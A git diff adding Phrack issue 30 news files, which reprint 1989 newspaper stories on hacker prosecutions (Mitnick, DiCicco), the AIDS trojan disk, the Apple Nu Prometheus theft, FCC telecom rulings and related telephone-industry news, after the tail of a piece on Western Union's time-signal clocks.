+would have taken too long, and ".....anyway, as long as we got it within a
+minute or so, it would synch itself the next time the master clock sent a
+signal..."  Working fast, it took a minute to a minute and a half to open the
+case, twirl the minute hand, put the case back on, "stop and b.s. with the
+receptionist for a couple seconds" and move along.
+
+The master clock sent its signal over regular telco phone lines.  Usually it
+would terminate in the main office of whatever place it was, and the (sub)
+master there would take over at that point.
+
+Wally said it was very important to do a professional job of hanging the clock
+to begin with.  It had to be level, and the pendulum had to be just right,
+otherwise the clock would gain or lose more time than could be accommodated in
+the hourly synching process.  He said it was a very rare clock that actually
+was out by even a minute once an hour, let alone the two minutes of tolerance
+built into the gear works.
+
+     "...Sometimes I would come to work on Monday morning, and find out
+     in the office that the clock line had gone open Friday evening.  So
+     nobody all weekend got a signal.  Usually I would go down a manhole
+     and find it open someplace where one of the Bell guys messed it up,
+     or took it off and never put it back on.  To find out where it was
+     open, someone in the office would 'ring out' the line; I'd go around
+     downtown following the loop as we had it laid out, and keep listening
+     on my headset for it.  When I found the break or the open, I would
+     tie it down again and the office would release the line; but then I
+     had to go to all the clocks *before* that point and restart them,
+     since the constant current from the office during the search had
+     usually caused them to stop."
+
+But he said, time and again, the clocks were usually so well mounted and hung
+that "...it was rare we would find one so far out of synch that we had to
+adjust it manually.  Usually the first signal to make it through once I
+repaired the circuit would yank everyone in town to make up for whatever they
+lost or gained over the weekend..."
+
+In 1965, Western Union decided to discontinue the Time Service.  In a nostalgic
+letter to subscribers, they announced their decision to suspend operations at
+the end of the current month, but said "for old time's sake" anyone who had a
+clock was welcome to keep it and continue using it; there just would not be any
+setting signals from the master clocks any longer.
+
+Within a day or two of the official announcement, every Western Union clock in
+the Chicago area headquarters building was gone.  The executives snatched them
+off the wall, and took them home for the day when they would have historical
+value.  All the clocks in the telegraph offices disappeared about the same
+time, to be replaced with standard office-style electric wall clocks.
+_______________________________________________________________________________
diff --git a/phrack30/11.txt b/phrack30/11.txt
new file mode 100644
index 0000000..52e637e
--- /dev/null
+++ b/phrack30/11.txt
@@ -0,0 +1,504 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 30, File #11 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXX/Part 1                 PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN         Special Thanks to Dark OverLord         PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+         Happy Holidays and Welcome to Issue XXX of Phrack World News!
+
+This issue of Phrack World News contains stories and articles detailing events
+and other information concerning Acid Phreak, AT&T, Apple Computer Co.,
+Bellcore, Bernie S., Klaus Brunnstein, Cap'n Crunch, Captain Crook, Chaos
+Communications Congress, Cheshire Catalyst, Clifford Stoll, CompuServe, Leonard
+Mitchell DiCicco, Emmanuel Goldstein, FCC, Katie Hafner, Harpers Magazine,
+Intellical, Michael Synergy, Kevin David Mitnick, Phiber Optik, Phonavision,
+Phrozen Ghost, Prime Suspect, Sir Francis Drake, Susan Thunder, Telenet, Terra,
+Tuc, Tymnet, The Well, and...
+
+      Announcing the Fourth Annual...
+
+                                 SummerCon '90
+                               June 22-24, 1990
+                             Saint Louis, Missouri
+
+This year's convention looks to be the more incredible than ever.  Many of you
+will be hearing from us directly over the next few months about what will be
+taking place and where SummerCon '90 will be held specifically.  The posted
+date is of course a tentative one (as we are still six months away), but any
+and all changes or new information will be in PWN and passed to our network
+friends.
+
+If you are thinking about attending SummerCon '90, please find a way to contact
+us as soon as possible.  If you are not on the Internet or one of the public
+access Unix systems across the country, then post a message on bulletin boards
+that asks who is in contact with us.  Chances are that there will be someone on
+there that can reach us.
+
+                 Knight Lightning / Forest Ranger / Taran King
+
+      "A New Decade Is Upon Us... And The Future Never Looked Brighter!"
+_______________________________________________________________________________
+
+Mitnick's Partner Gets Community Service                      November 29, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Kathy McDonald (New York Times)
+
+    "Man Sentenced To Community Service For Helping Steal Computer Program"
+
+LOS ANGELES -- A federal judge has sentenced a 24-year-old suburban Calabasas
+man to community service at a homeless shelter for his role in helping computer
+hacker Kevin Mitnick steal a computer security program.
+
+In rejecting a sentencing report that suggested a prison term, U.S. District
+Judge Mariana Pfaelzer noted that Leonard Mitchell DiCicco had voluntarily
+notified authorities of the computer hacking.
+
+"I think you can do some good" in the community by using his computer skills
+productively, Pfaelzer told DiCicco.
+
+She sentenced DiCicco to five years of probation, during which he must complete
+750 hours of community service through the Foundation for People, a Los Angeles
+group that matches probationers with community service projects.
+
+DiCicco was assigned to develop a computer system for the Anaheim Interfaith
+Shelter, said Frances Dohn, a foundation official.
+
+DiCicco also was ordered to pay $12,000 in restitution to Digital Equipment
+Corporation of Massachusetts, from which Mitnick stole a computer security
+program.
+
+Assistant U.S. Attorney James Asperger agreed with the community service
+sentence, saying DiCicco's cooperation had been crucial in the case against
+Mitnick.
+
+DiCicco reported Mitnick to DEC officers.  Mitnick later admitted he stole the
+program and electronically brought it to California.
+
+DiCicco pleaded guilty in July to one count of aiding and abetting the
+interstate transportation of stolen property.  He admitted that in 1987 he let
+Mitnick, age 25, of suburban Panorama City, use his office computer at
+Voluntary Plan Administrators in Calabasas to break into the DEC system.
+
+Mitnick pleaded guilty and was sentenced in July to one year in prison and six
+months in a community treatment program aimed at breaking his "addiction" to
+computer hacking.
+
+Under a plea bargain agreement with the government, DiCicco pleaded guilty in
+July in exchange for a promise that he would not be prosecuted for any of the
+other instances of computer hacking he and Mitnick carried out.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+If you are looking for other articles related to Leonard Mitchell DiCicco and
+the famous Kevin David Mitnick please refer to;
+
+"Pacific Bell Means Business"                      (10/06/88) PWN XXI....Part 1
+"Dangerous Hacker Is Captured"                     (No Date ) PWN XXII...Part 1
+"Ex-Computer Whiz Kid Held On New Fraud Counts"    (12/16/88) PWN XXII...Part 1
+"Dangerous Keyboard Artist"                        (12/20/88) PWN XXII...Part 1
+"Armed With A Keyboard And Considered Dangerous"   (12/28/88) PWN XXIII..Part 1
+"Dark Side Hacker Seen As Electronic Terrorist"    (01/08/89) PWN XXIII..Part 1
+"Mitnick Plea Bargains"                            (03/16/89) PWN XXV....Part 1
+"Mitnick Plea Bargain Rejected As Too Lenient"     (04/25/89) PWN XXVII..Part 1
+"Computer Hacker Working On Another Plea Bargain"  (05/06/89) PWN XXVII..Part 1
+"Mitnick Update"                                   (05/10/89) PWN XXVII..Part 1
+"Kenneth Siani Speaks Out About Kevin Mitnick"     (05/23/89) PWN XXVII..Part 1
+"Judge Suggests Computer Hacker Undergo Counseling"(07/17/89) PWN XXVIII.Part 1
+"Authorities Backed Away From Original Allegations"(07/23/89) PWN XXVIII.Part 1
+"Judge Proposes Comm. Service For Hacker's Accomp."(10/13/89) PWN XXX....Part 1
+_______________________________________________________________________________
+
+Chaos Communications Congress
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Terra of the Chaos Computer Club
+
+On December 27-29, 1989 is the Chaos Communication Congress at Eidelstaedter
+Buergerhaus, Hamburg, West Germany.
+
+The topics of this Congress include:
+
+-  The new German PTT law
+
+-  Discussion about Copyright and Freedom of Information act
+
+-  Women and Computers
+
+-  Mailbox and other Networks (Zerberus, InterEuNet, UUCP)
+
+-  Workshops for East and West German people to build networks between the two
+   countries.
+
+-  Discussion between Professor Klaus Brunnstein and CCC members about the
+   problems of viruses and worms.
+
+-  Workshops about Unix and UUCP for beginners, advanced, and special people
+
+-  Presswork in a special room
+
+-  Workshop Cyberbrain or Cyberpunk
+
+-  Workshop and Discussion about Secure Networks (Special:  TeleTrust, coding
+   mixed gateways)
+
+The prices to enter the Congress are
+
+33 DM for Normal people
+23 DM for CCC-members
+53 DM for Press
+
+Regards,
+
+          Terra
+_______________________________________________________________________________
+
+Phonavision At The University of California                    October 15, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken From the New York Times
+
+CALIFORNIA -- Students at two campuses of the University of California, at
+Berkeley and Los Angeles, have become the test market for a new public
+video-telephone booth called Phonavision.
+
+Its developers claim that it is the world's first video telephone for the
+general public.
+
+Each of the campuses has one of the large, silver-color phone booths in its
+student union.  Phonavision opened on October 9, for a week of free
+demonstrations.  Starting October 16, video phone calls from one campus to the
+other will cost $10 for three minutes.
+
+"We view all this semester as a test," said Stephen Strickland, chief executive
+officer of the Los Angeles-based company, Communications Technologies, that
+developed the video phones.  "We want to be sure that when we do go to market
+with this service, it's as good as it can be."
+
+"We feel we're probably six months to a year away from having a system that we
+can go out and market," Strickland said.  "I see them in airport lobbies, hotel
+lobbies, shopping centers, indoor high-traffic locations."  Video telephones
+are already widely used in business, he added.
+
+Phonavision callers speak to each other on standard telephone receivers.
+
+A snapshot-size image of their own face is projected on one half of a small
+screen, and the other half shows a picture of the person to whom they are
+talking.
+
+As a caller talks, the video screen shows small movements of the mouth or face.
+But sudden movements mean a distorted picture.
+
+With a tilt of a caller's head, for example, the image will move to the side in
+separate parts, starting with the top of the head and moving down in a wavelike
+motion.
+
+Annalee Andres, a sophomore from Santa Ana, California, who has not yet
+selected a major, was one of the first students to try out Berkeley's new video
+phone.  She and her friends crowded around the phone booth in the Martin Luther
+King Jr. Student Center, taking turns talking to a student from UCLA.
+
+"I think it has a long way to go yet, but it's really cool," she said.  "I can
+really see where it's leading."
+
+Ms. Andres speculated on the effects that widespread use of video phones would
+have.  "What if they catch you and you're just out of the shower?" she asked.
+"It'll change dating."
+
+Daniel Ciruli, a junior from Tucson, Arizona, majoring in computer science, was
+enthusiastic about his trial session, but he said the fee would keep him away
+in the future.
+
+"It's a new toy," he said.  "But at $10 for three minutes, with only one other
+Phonavision, it's not going to be something that students are beating down the
+door to use."
+
+The video phone booth offers other services:  Recording and dealing in
+videotapes and a place to send and receive fax messages.  The booth accepts $1,
+$5, $10 and $20 bills, as well as Mastercard and Visa.
+
+Gary Li, a senior from Beijing, who is majoring in electrical engineering,
+started setting up Berkeley's phone booth in April.  Since then he has spent
+about 20 hours a week repairing kinks in the system.
+
+Berkeley and UCLA were chosen as tryout spots for the new service because most
+students know somebody at the other campus, said Strickland, the company's
+chief executive.
+
+"That's a place where we can get novelty use," he said, adding that "Berkeley
+and UCLA have a reputation for being front-runner schools -- places that are
+innovative, that like new technology."
+
+Strickland said his company has spent almost three years developing
+Phonavision.  He would not disclose total costs, but priced the video phone
+booths at $50,000 each.
+_______________________________________________________________________________
+
+The Omnipresent Telephone                                      October 10, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from The New York Times
+
+Whatever the psychological implications, new technology has clearly made the
+phone more omnipresent.  More calls are generated because of answering
+machines, now owned by 28 percent of the nation's households, according to the
+Electronic Industries Association.  People who use them say they make and
+receive more calls because of them.
+
+"In olden days you would just miss the call," said Michael Beglin, a
+businessman in Nashville.
+
+Jill Goodman, an art dealer in New York, says she talks on the phone so often
+that "I'm tortured about it, teased and insulted."  She uses the phone to
+socialize, shop and check in with people she wants to stay in touch with but
+does not want to take the time to see.
+
+"I have two lines in the country, two lines at home in the city and three lines
+in my office, if that gives you any idea of how much phone I can generate," she
+said.
+
+A month ago, after resisting initially, she decided to have a car phone
+installed.  "I thought it might be nice to have a couple of hours without being
+reachable," she said.  "But I didn't like not being able to reach when I wanted
+to."
+
+Increasingly, too, people are using the phone to get services, information and
+products.
+
+The 900 numbers, which require callers to pay the cost, and the 800 numbers,
+paid for by the calls' recipients, are growing quickly.
+
+Sprint Gateways started a new 900 service in May that already has 250 lines.
+Callers can get wrestling trivia, financial updates, real-estate information
+and a host of other data.  They can even play a version of "Family Feud," which
+receives as many as 7,000 calls a day, said Adrian Toader, the director of
+sales and marketing.
+
+Telephone shopping through 800 numbers continues to grow, too.  In 1986, L.L.
+Bean, the Freeport, Maine, retailer, received 60 percent of its orders by
+telephone and 40 percent by mail; by 1988, telephone orders had risen to 70
+percent.  Like an increasing number of retailers, L.L. Bean allows customers to
+call in their orders 24 hours a day.
+
+But callers to 800 numbers often want more than a new shirt or sweater.
+
+Susan Dilworth, who takes telephone orders for L.L. Bean, said, "A lot of
+people call and say:  'I'm coming to New England for the first time.  How
+should I dress?'"  Other callers order merchandise but then begin talking about
+their personal lives.  "I think they're lonely," Mrs. Dilworth said.
+
+Indeed, these anonymous but personal contacts are so popular that some people
+are becoming hooked.
+
+Marilyn Ng-A-Qui, the acting executive director of the New York City Self-Help
+Clearinghouse, said one man called looking for help because he had run up a
+$5,000 bill calling 900 numbers.  "It is emerging as a problem all over the
+country," she said.
+
+Despite the deluge of telephone conversation, there are holdouts.  Lois Korey,
+a partner in a New York advertising agency, writes letters whenever she can,
+often suggesting lunch meetings.  "I really like to see who I'm talking to,"
+she said.
+
+But even her partner, Allen Kay, calls her from his office just four feet away.
+The only time he could not telephone, Mrs. Korey said, was when he was in his
+car.  And now those days are over.  "He got a car phone a month ago, and he
+calls all the time," she said.  "When I sit in the front seat of his car, I try
+to step on it."
+_______________________________________________________________________________
+
+Higher Phone Rates For Modem Users                            November 26, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(Material gathered from an Apple digest on Usenet)
+
+A new regulation that the FCC is quietly working on will directly affect you as
+the user of a computer and modem.  The FCC proposes that users of modems should
+pay extra charges for use of the public telephone network which carry their
+data.
+
+In addition, computer network services such as CompuServe, Tymnet, & Telenet
+would also be charged as much as $6.00 per hour per user for use of the public
+telephone network.  These charges would very likely be passed on to the
+subscribers.
+
+The money is to be collected and given to the telephone company in an effort to
+raise funds lost to deregulation.
+
+Jim Eason of KGO newstalk radio (San Francisco, California) commented on the
+proposal during his afternoon radio program during which, he said he learned of
+the new legislation in an article in the New York Times.  Jim took the time to
+gather the addresses which are given below.
+
+It is important that you act now.  The bureaucrats already have it in there
+mind that modem users should subsidize the phone company and are now listening
+to public comment.  Please stand up and make it clear that we will not stand
+for any government restriction on the free exchange of information.
+
+The people to write to about this situation are:
+
+Chairman of the FCC
+1919 M Street N.W.
+Washington, D.C. 20554
+
+Chairman, Senate Communication Subcommittee
+SH-227 Hart Building
+Washington, D.C. 20510
+
+Chairman, House Telecommunication Subcommittee
+B-331 Rayburn Building
+Washington, D.C. 20515
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Here is a sample letter:
+
+Dear Sir,
+     Please allow me to express my displeasure with the FCC proposal which
+would authorize a surcharge for the use of modems on the telephone network.
+This regulation is nothing less than an attempt to restrict the free exchange
+of information among the growing number of computer users.  Calls placed using
+modems require no special telephone company equipment, and users of modems pay
+the phone company for use of the network in the form of a monthly bill.  In
+short, a modem call is the same as a voice call and therefore should not be
+subject to any additional regulation.
+_______________________________________________________________________________
+
+FCC Orders Refunds to Long-Distance Companies                 November 30, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Taken from Associated Press
+
+WASHINGTON -- Local telephone companies may have to refund as much as $75
+million to long-distance companies and large private-line business customers,
+the Federal Communications Commission says.
+
+Pacific Northwest Bell in Idaho is one of the 15 companies named.  The local
+phone companies accumulated overcharges between 1985 and 1988 under FCC
+guidelines that allowed prices of these high capacity private-line services to
+exceed the phone companies' costs of providing the services.
+
+The FCC ordered a refund as it considered challenges to the special pricing
+scheme, which the local phone companies provide for long-distance companies or
+large business customers.  The commission voted 4-0 that the scheme was legal
+during the 1985-88 period, when the high prices were designed to keep too many
+customers from switching from the regular public network to private lines, but
+that market conditions no longer justify continuation of the special pricing.
+The commission said it expects the local phone companies to refrain from
+requesting such special prices in the future.
+
+While examining the challenges to the special pricing scheme, the commission
+said it found that local phone companies in some cases had charged more than
+allowed under the commission's guidelines.  Therefore, the companies must
+refund those charges, which could amount to as much as $75 million, the
+commission said.  The FCC said the amount of the refunds will not be known
+until the local phone companies file detailed reports with the commission.  The
+companies have 40 days to make their filings.
+
+The companies found not to be in compliance with the commission's pricing
+guidelines from October 1, 1985 to December 31, 1986 were:
+
+-  Diamond State
+-  South Central Bell in Alabama
+-  Southwestern Bell in Missouri and Oklahoma
+-  Northwestern Bell in Iowa, Minnesota, Nebraska, and North Dakota
+-  Pacific Northwest Bell in Idaho
+
+Pacific Northwest Bell is now called U.S. West Communications and is the phone
+company that serves most Seattle-area residents.
+
+Companies found not complying from January 1, 1987 to December 31, 1988 were:
+
+-  Ohio Bell
+-  Wisconsin Bell
+-  Southern Bell in North Carolina and South Carolina
+-  South Central Bell in Mississippi and Tennessee
+-  Pacific Bell
+-  Nevada Bell
+-  Southwestern Bell
+-  Mountain Bell
+-  Northwestern Bell
+-  Cincinnati Bell
+_______________________________________________________________________________
+
+AT&T v. Intellicall:  Another Lawsuit                          November 8, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Dallas -- AT&T filed a lawsuit charging that a Texas-based corporation equips
+its pay telephones to illegally obtain billing information owned by AT&T.
+
+The lawsuit asks for $2 million in punitive damages and an undetermined amount
+in actual damages from Intellicall Inc., headquartered in Carrollton, Texas.
+It also asks the U.S. District Court in Dallas to order Intellicall to stop its
+unauthorized use of AT&T billing information.
+
+At issue is how Intellicall pay phones determine the validity of calling card
+numbers for billing purposes.  AT&T contends that Intellicall pay phones are
+designed and programmed by Intellicall to reach into and obtain the information
+directly from AT&T's card validation system.
+
+That system, called Billing Validation Application (BVA), is a part of AT&T's
+network facilities.  Before AT&T completes a call that will be charged to an
+AT&T Card, its validation system verifies that the number provided by the
+customer is currently valid.
+
+Based on contractual arrangements made before the 1984 breakup of the Bell
+System, regional Bell telephone companies also use the validation system.  AT&T
+does not permit competitors such as Intellicall to use the system because the
+system was built by AT&T and contains valuable competitive information.
+
+AT&T alleges that when callers use an AT&T Card or Bell company calling card at
+an Intellicall pay phone, the pay phone automatically places a separate call
+through AT&T or local Bell facilities to a pre-programmed telephone number so
+that AT&T's validation system will automatically check the card number.
+
+If the card number is valid, the Intellicall pay phone then puts through the
+original customer call.
+
+"As a result of these practices," the lawsuit says, "Intellicall
+surreptitiously and without authorization obtains validation data from AT&T,
+obtains fraud control for calls by its customers without having to invest in
+fraud control facilities or otherwise purchase fraud control services, imposes
+costs on AT&T, and... obtains an unfair advantage over its competitors
+providing pay telephone and/or long-distance service, including AT&T."
+
+Although AT&T does not authorize other companies to accept the AT&T Card and
+does not permit competitors to use its validation system, the lawsuit notes
+that Intellicall could purchase validation services for Bell company calling
+cards from other companies.
+
+AT&T said it notified Intellicall that it was violating AT&T's proprietary
+rights and gave Intellicall every reasonable opportunity to halt the fraudulent
+validation practice.  Only after Intellicall persisted in its unfair practices
+did AT&T decide to take legal action.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+AT&T v. Intellicall:  The Lawsuit Is Over                     November 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Dallas -- AT&T and Intellicall, Inc. today announced the settlement of a
+lawsuit filed by AT&T against Intellicall, seeking damages and an injunction.
+AT&T had accused Intellicall of unauthorized access to AT&T's calling card
+validation system.
+
+The settlement also covered potential counterclaims which Intellicall intended
+to file against AT&T.
+
+In the agreement, Intellicall acknowledged AT&T's proprietary rights in the
+Billing Validation Application system, and agreed to make modifications in its
+licensed pay telephone software to safeguard against unauthorized access and
+use of the AT&T system.
+
+The terms of the agreement include an undisclosed payment by Intellicall to
+AT&T to contribute to the establishment of a compliance program which will
+permit AT&T to monitor unauthorized access to its billing systems.
+
+"AT&T is pleased that a settlement recognizing AT&T's proprietary right to the
+validation system was reached so quickly," said Gerald Hines, director of AT&T
+Card Services.
+_______________________________________________________________________________
diff --git a/phrack30/12.txt b/phrack30/12.txt
new file mode 100644
index 0000000..ef80a80
--- /dev/null
+++ b/phrack30/12.txt
@@ -0,0 +1,476 @@
+                                ==Phrack Inc.==
+
+                    Volume Three, Issue 30, File #12 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN                Issue XXX/Part 2                 PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN         Special Thanks to Dark OverLord         PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+U.S. Inquiry Into Theft From Apple                            November 19, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+A former Apple Computer Inc. engineer has said he was served with a grand jury
+subpeona and told by an FBI agent that he is a suspect in a theft of software
+used by the company to design its Macintosh computer.
+
+In June a group identifying itself as the Nu Prometheus League mailed copies of
+computer disks containing the software to several trade magazines and software
+developers.
+
+Grady Ward, age 38, who worked for Apple until January (1989), said that he
+received the subpeona from an FBI agent, who identified himself as Steven E.
+Cook.
+
+Ward said the agent told him that he was one of five suspects drawn from a
+computerized list of people who had access to the material.  The agent said the
+five were considered the most likely to have taken the software.
+
+A spokesman for the FBI in San Francisco said the agency would not comment on a
+continuing investigation.
+
+Ward said he had told the FBI he was innocent but would cooperate with the
+investigation.
+
+The theft of Apple's software has drawn a great deal of attention in Silicon
+Valley, where technology and trade-secret cases have highlighted the crucial
+role of skilled technical workers and the degree to which corporations depend
+on their talents.
+
+The case is unusual because the theft was apparently undertaken for
+philosophical reasons and not for personal profit.
+
+There is no indication of how many copies of the program were sent by Nu
+Prometheus.
+
+Software experts have said the programs would be useful to a company trying to
+copy the distinctive appearance of the Macintosh display, but it would not
+solve legal problems inherent in attempting to sell such a computer.  Apple has
+successfully prevented many imitators from selling copies of its Apple II and
+Macintosh computers.
+
+The disks were accompanied by a letter that said in part:  "Our objective at
+Apple is to distribute everything that prevents other manufacturers from
+creating legal copies of the Macintosh.  As an organization, the Nu Prometheus
+League has no ambition beyond seeing the genius of a few Apple employees
+benefit the entire world."
+
+The group said it had taken its name from the Greek god who stole fire from the
+gods and gave it to man.
+
+The letter said the action was partially in response to Apple's pending suit
+against Microsoft Corp. and Hewlett-Packard Co., accusing them of copying the
+"look and feel" -- the screen appearance -- of the Macintosh.
+
+Many technology experts in Silicon Valley believe Apple does not have special
+rights to its Macintosh technology because most of the features of the computer
+are copied from research originally done at Xerox Corp.'s Palo Alto Research
+Center during the 1970s.  The Macintosh was not introduced until 1984.
+
+The theft came to light in June after Macweek, a trade magazine, published the
+letter from Nu Prometheus.
+
+At the time the theft was reported, executives at Apple, based in Cupertino,
+California, said they took the incident seriously.
+
+A spokeswoman said that Apple would not comment on details of the
+investigation.
+
+Ward said he had been told by the FBI agent that the agency believed Toshiba
+Corp. had obtained a copy of the software and that copies of the program had
+reached the Soviet Union.
+
+The software is not restricted from export to the Communist bloc.  Its main
+value is commercial as an aid in copying Apple's technology.
+
+Ward said the FBI agent would not tell him how it believed Toshiba had obtained
+a copy of the software.
+
+Ward also said the FBI agent told him that a computer programmer had taken a
+copy of the software to the Soviet Union.
+
+Ward said the FBI agent told him he was considered a suspect because he was a
+"computer hacker," had gone to a liberal college and had studied briefly at the
+Massachusetts Institute of Technology's Artificial Intelligence Laboratory.
+
+The term "hacker" was first used at MIT to describe young programmers and
+hardware designers who mastered the first interactive computers in the 1960s.
+
+Ward is the second person to be interviewed by the FBI in the investigation of
+the theft.
+
+Earlier Charles Farnham, a businessman in San Jose, California, said two FBI
+agents came to his office, but identified themselves as reporters for United
+Press International.
+
+Farnham, a Macintosh enthusiast, has disclosed information about unannounced
+Apple products, said that after asking him to come outside his office, the men
+said they were FBI agents and proceeded to question him about Nu Prometheus
+group.  He said he was not told that he was a suspect in the case.
+
+UPI has complained to the FBI because of the incident.
+
+Ward said he had joined Apple in 1979 and left last January to start his own
+company, Illumind.  He sells computerized dictionaries used as spelling
+checkers and pronunciation guides.
+
+He said the FBI told him that one person who had been mailed a copy of the
+Apple software was Mitchell Kapor, founder of Lotus Development Corporation.
+
+Kapor returned his copy of the disk unopened, Ward said the agent told him.
+
+Ward said the FBI had also said he was suspect because he had founded a group
+for the gifted known as Cincinnatus, which the agent said had roots in Greek
+mythology that were similar to the Nu Prometheus group.
+
+Ward said the FBI was mistaken, and Cincinnatus is a reference from ancient
+Roman history, not Greek mythology.
+_______________________________________________________________________________
+
+Data-Destroying Disc Sent To European Computer Users          December 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by John Markoff (New York Times)
+
+A computer disk containing a destructive program known as a Trojan horse has
+been mailed to computer users in at least four European countries.
+
+It was not clear if any copies of the program had been mailed to people in the
+United States.
+
+The program, which threatens to destroy data unless a user pays a license fee
+to a fictitious company in Panama City, Panama, may be a widespread attempt to
+vandalize thousands of personal computers, several computer experts who have
+studied the program said Tuesday, December 12.
+
+Some computer experts said the disk was mailed by a "PC Cyborg" company to
+subscribers of personal computer trade magazines, apparently using mailing
+lists.
+
+The disk is professionally packaged and accompanied by a brochure that
+describes it as an "Aids Information Disk," the computer experts said.  But
+when it is installed in the user's computer it changes several files and hides
+secret programs that later destroy data on the computer disk.
+
+Paul Holbrook, a spokesman for the Computer Emergency Response Team, a U.S.
+government-financed security organization in Pittsburgh, said his group had
+confirmed the existence of the program, but did not know how widely it had
+spread.
+
+Trojan horses are programs hidden in software that secretly insert themselves
+in a computer when the software masking them is activated.  They are different
+from other secret programs like viruses and worms because they are not
+infectious:  They do not automatically copy themselves.
+
+A licensing agreement that accompanies the disk contains threatening
+information.
+
+It reads in part:  "In case of your breach of this license, PC Cyborg reserves
+the right to take any legal action necessary to recover any outstanding debts
+payable to the PC Cyborg Corporation and to use program mechanisms to ensure
+termination of your use of these programs.  The mechanisms will adversely
+affect other programs on your microcomputer."
+
+When it destroys data, the program places a message on the screen that asks
+users to send $387 to a Panama City address.
+
+John McAfee, a computer security consultant in Santa Clara, California, said
+the program had been mailed to people in England, West Germany, France and
+Italy.
+_______________________________________________________________________________
+
+The Executive Computer:  From Espionage To Using A Printer     October 27, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Peter H. Lewis (New York Times)
+
+Those executives who pay attention to computers are more likely to worry about
+grand issues like productivity and small ones like how to make their personal
+printers handle envelopes than whether the KGB has penetrated their companies.
+In a fresh crop of books, they will find lessons on all these matters.
+
+Perhaps the most entertaining of the new books is "The Cuckoo's Egg" ($19.95,
+Doubleday), by Dr. Clifford Stoll, an astronomer.
+
+Because he was the rookie in the Lawrence Berkeley Laboratories in California,
+he was asked to track down and fix a glitch in the lab's accounting software,
+which had found a 75-cent discrepancy when it tried to balance the books.
+
+"First-degree robbery, huh?" was Stoll's first reaction.  But by the time he
+was done nearly a year later, he had uncovered a West German spy ring that had
+cracked the security of American military and research computer networks,
+gathering information that it sold to Moscow.
+
+Beyond the entertainment value of this cat-and-mouse hunt, the book has lessons
+for any corporate computer user.  The message is clear:  Most companies are
+irresponsible about security.
+
+The ease with which the "hacker" penetrated even military installations was
+astonishing, but not as astonishing as the lack of concern by many of the
+victims.
+
+"The Cuckoo's Egg" follows the hunt for the unknown intruder, who steals
+without taking and threatens lives without touching, using only a computer
+keyboard and the telephone system.
+
+The detective is an eccentric who sleeps under his desk, prefers bicycles to
+cars, and suddenly finds himself working with the Federal Bureau of
+Investigation, the Central Intelligence Agency and the National Security
+Agency.
+
+Although the criminal and the hunter deal in the esoteric realm of computer
+code and data encryption, Stoll makes the technology accessible.
+
+He also discovers that navigating the global electronic grid is less difficult
+than navigating the bureaucracies of various government agencies.
+
+And while he was a whiz at tracing the cuckoo's electronic tracks from Berkeley
+to Okinawa to Hannover, West Germany, Stoll reveals himself to be helplessly
+lost on streets and highways and befuddled by such appliances as a microwave
+oven.
+
+Besides the more than 30 academic, military and private government
+installations that were easy prey for the spies, the victims included Unisys,
+TRW, SRI International, the Mitre Corporation and Bolt Beranek & Newman Inc. --
+some of the very companies that design, build and test computer systems for the
+government.
+
+"No doubt about it, the shoemaker's kids are running around barefoot," Stoll
+writes.
+
+One leading character in the book is Dr. Bob Morris, chief scientist for the
+National Security Agency and the inventor of the security for the Unix
+operating system.
+
+An epilogue to the book, dealing with an unrelated computer crime, recounts the
+discovery that it was Morris's son who wrote the rogue program that shut down a
+national network for several days last year.
+
+In "The Macintosh Way" ($19.95, Scott, Foresman & Co.), Guy Kawasaki, a former
+Apple Computer Inc. executive who is now president of a software company, has
+written a candid guide about management at high-technology companies.
+
+Although his book is intended for those who make and market computer goods, it
+could prove helpful to anyone who manages a business.
+_______________________________________________________________________________
+
+Dialing Away U.S. Area Codes                                  November 13, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Laure O'Brien (Telephony Magazine)
+
+The current endangered species in the news may not be an animal at all.  The
+number of available area codes in the United States is dwindling rapidly.
+Chicago consumed a new code on November 11, 1989 and and New Jersey will gobble
+up another one on January 1, 1990.
+
+There are only nine codes left, and they are expected to be used up by 1995,
+said Robert McAlesse, North American Numbering Plan administrator and member of
+Bellcore's technical staff.
+
+"In 1947 (Bellcore) started with 86 codes, and they projected exhaustion in 100
+to 150 years.  They were off by a few years," McAlesse said.
+
